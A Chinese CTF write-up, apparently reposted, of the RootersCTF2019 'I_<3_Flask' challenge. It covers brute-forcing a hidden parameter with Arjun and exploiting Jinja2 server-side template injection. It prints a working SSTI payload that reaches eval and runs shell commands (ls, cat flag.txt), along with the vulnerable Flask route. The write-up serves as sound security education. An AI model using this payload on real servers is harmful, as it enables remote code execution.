[RootersCTF2019] I_<3_Flask
2021/6/20 6:27:19
本文主要是介绍[RootersCTF2019] I_<3_Flask,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
简单的参数爆破+jinja2模板注入(ssti)
解题过程
打开题目,从题目名称以及主页面可知题目是由Flask搭建
第一思路应该是寻找Flash路由,扫了一下发现没有源码泄漏,常见的一些隐藏提示点都看了一下,发现没有什么提示
在这里就需要考虑一下参数爆破了,使用工具Arjun进行参数爆破:
python3 arjun -u http://270ecd40-84d3-4667-bee9-04c7c2aeb5c2.node3.buuoj.cn/ -c 100 -d 5
讲道理这里-d 5的作用是请求间隔,BUUOJ设置了防D,如果不加-d 5可能就会429然后导致爆破不出来,当然,加上延时后速度自然慢的离谱
看了集电视剧之后回来看到爆破出了参数name
在URL后面加上/?name=1
测试一下:
简单测试一下是否存在ssti,构造/?name={{2*2}}
请求:
可以看到{{2*2}}
被直接执行了,判断一下发现是jinja2的模板,fuzz一下发现没有什么过滤,直接上RCE的payload:
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("ls").read()') }} //这里的ls就是需要的执行命令 {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
先ls列出目录:
I ♥ Flask & application.py flag.txt requirements.txt static templates
然后直接执行cat flag.txt
即可得到flag:
题目做完之后反过来再看看路由怎么写的:
from flask import Flask, render_template_string, request app = Flask(__name__) app.secret_key = "fuk9dfuk5680fukbddbee2fuk" @app.route('/', methods=['GET']) def index(): name = 'Flask' + ' & ' + request.args.get("name", default="Flask") //可以看到下面这行代码直接拼接了name参数的值,从而导致了ssti漏洞 template = """ {% extends "layout.html" %} {% block content %} <div class="content-section"> I ♥ """ + name + """ </div> {% endblock %}""" return render_template_string(template) if __name__ == '__main__': app.run(debug=False)
这篇关于[RootersCTF2019] I_<3_Flask的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-29uni-app 中使用 Vant Weapp,怎么安装和配置npm ?-icode9专业技术文章分享
- 2024-12-27Nacos多环境配置学习入门
- 2024-12-27Nacos快速入门学习入门
- 2024-12-27Nacos快速入门学习入门
- 2024-12-27Nacos配置中心学习入门指南
- 2024-12-27Nacos配置中心学习入门
- 2024-12-27Nacos做项目隔离学习入门
- 2024-12-27Nacos做项目隔离学习入门
- 2024-12-27Nacos初识学习入门:轻松掌握服务发现与配置管理
- 2024-12-27Nacos初识学习入门:轻松掌握Nacos基础操作